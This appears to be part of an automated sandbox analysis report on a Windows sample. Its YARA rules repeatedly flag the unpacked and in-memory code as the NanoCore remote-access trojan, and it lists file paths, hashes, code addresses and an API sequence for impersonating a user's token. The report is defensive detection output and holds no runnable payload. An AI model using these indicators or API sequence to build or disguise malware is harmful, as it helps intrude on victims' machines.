Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000003.511336975.00000000074D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000003.511098071.00000000074D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095848E
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00966CDC
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00964088
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009600B7
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009540FE
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009751C9
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00967153
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009662CA
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009532F7
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009643BF
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095C426
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0097D440
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095F461
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009677EF
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0097D8EE
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095286B
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095E9B7
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009819F4
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00963E0B
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00974F9A
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095EFE2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00278037
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00272007
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0026E0BE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0025E1A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0025225D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0028A28E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002722C2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0026C59E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002DC7A3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0028E89F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C291A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00286AFB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002B8B27
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0027CE30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00287169
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002E51D2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00259240
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00259499
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00271724
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00271A96
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00259B60
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00277BAB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00271D40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00277DDA

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002B1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Section loaded: dxgidebug.dll

Source: P05jmXYKpr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
